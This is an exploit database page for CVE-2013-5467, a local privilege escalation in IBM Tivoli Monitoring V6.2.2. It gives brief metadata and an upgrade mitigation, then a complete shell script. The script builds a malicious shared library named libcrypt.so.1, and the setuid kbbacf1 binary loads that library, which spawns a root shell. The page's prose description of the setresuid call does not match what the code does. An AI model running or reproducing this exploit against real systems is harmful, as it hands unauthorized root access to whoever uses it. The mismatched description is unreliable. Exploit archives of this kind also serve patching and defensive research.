IBM Tivoli Monitoring V6.2.2 kbbacf1 privilege escalation exploit

vendor:

Tivoli Monitoring

by:

Robert Jaroszuk

7,2

CVSS

HIGH

Privilege Escalation

269

CWE

Product Name: Tivoli Monitoring

Affected Version From: IBM Tivoli Monitoring V6.2.2

Affected Version To: IBM Tivoli Monitoring V6.2.2

Patch Exists: YES

Related CWE: CVE-2013-5467

CPE: a:ibm:tivoli_monitoring:6.2.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: RedHat 5, Centos 5

2013

IBM Tivoli Monitoring V6.2.2 kbbacf1 privilege escalation exploit

This exploit is used to gain root privileges on IBM Tivoli Monitoring V6.2.2. The exploit uses a shared library to execute a setresuid() call to set the effective user ID to the real user ID, thus granting root privileges. The shared library is compiled with a version script to ensure that it is loaded by the vulnerable kbbacf1 binary.

Mitigation:

Upgrade to the latest version of IBM Tivoli Monitoring.

Source

Exploit-DB raw data:

#!/bin/sh
# Title: IBM Tivoli Monitoring V6.2.2 kbbacf1 privilege escalation exploit
# CVE: CVE-2013-5467
# Vendor Homepage: http://www-03.ibm.com/software/products/pl/tivomoni
# Author: Robert Jaroszuk
# Tested on: RedHat 5, Centos 5
# Vulnerable version: IBM Tivoli Monitoring V6.2.2 (other versions not tested)
#
echo "[+] Tivoli pwner kbbacf1 privilege escalation exploit by Robert Jaroszuk"
echo "[+] Preparing the code..."
cat > kbbacf1-pwn.c << DONE
#define _GNU_SOURCE
#include <unistd.h>
#include <stdlib.h>
#include <dlfcn.h>

void __cxa_finalize (void *d) {
    return;
}

void __attribute__((constructor)) init() {
    setresuid(geteuid(), geteuid(), geteuid());
    execl("/bin/sh", (char *)NULL, (char *)NULL);
}
DONE

cat > version << DONE
GLIBC_2.2.5 { };
GLIBC_2.3 { };
GLIBC_2.3.2 { };
GLIBC_PRIVATE { };
DONE
echo "[+] Preparing the code... part2"
/usr/bin/gcc -Wall -fPIC -shared -static-libgcc -Wl,--version-script=version -o libcrypt.so.1 kbbacf1-pwn.c

echo "[+] Cleaning up..."
/bin/rm -f kbbacf1-pwn.c version

echo "[+] Exploiting."
/opt/IBM/ITM/tmaitm6/lx8266/bin/kbbacf1